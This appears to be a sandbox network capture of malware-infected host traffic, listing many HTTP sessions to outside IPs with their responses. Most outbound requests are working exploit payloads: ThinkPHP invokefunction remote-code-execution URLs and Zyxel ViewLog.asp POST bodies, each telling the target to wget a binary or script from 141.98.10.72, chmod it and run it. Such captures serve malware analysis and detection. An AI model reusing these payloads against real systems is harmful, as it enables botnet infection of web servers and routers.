Feb 14, 2024 09:30:33.911087036 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:34.059140921 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:33 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
739	192.168.2.15	38118	95.216.175.59	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:33.984535933 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:34.209214926 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
740	192.168.2.15	55242	95.59.106.192	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:34.062553883 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:34.356636047 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:34.361047983 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
741	192.168.2.15	59956	112.167.244.204	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:34.346873045 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:34.631851912 CET	270	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 113 Connection: close Date: Wed, 14 Feb 2024 08:31:21 GMT Server: httpd Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
742	192.168.2.15	38124	95.216.175.59	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:34.434632063 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
743	192.168.2.15	51770	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:35.613276958 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:06Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
744	192.168.2.15	37244	31.136.214.231	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.282176018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.512178898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.655945063 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687884092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.263025999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:11.413505077 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
745	192.168.2.15	50842	85.143.160.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.299185038 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
746	192.168.2.15	33828	94.190.178.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.300669909 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:36.542227983 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
747	192.168.2.15	36250	94.120.14.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.308357954 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
748	192.168.2.15	36110	94.122.206.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.310131073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
749	192.168.2.15	47226	94.121.147.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.310240030 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
750	192.168.2.15	33040	31.44.137.42	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.314409971 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
751	192.168.2.15	58658	31.136.201.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.485084057 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.112276077 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.360239029 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.048083067 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:46.167898893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.151693106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119189024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:57.078089952 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
752	192.168.2.15	58028	31.136.215.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.502897024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.176211119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.520255089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304243088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:46.679979086 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.431719065 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
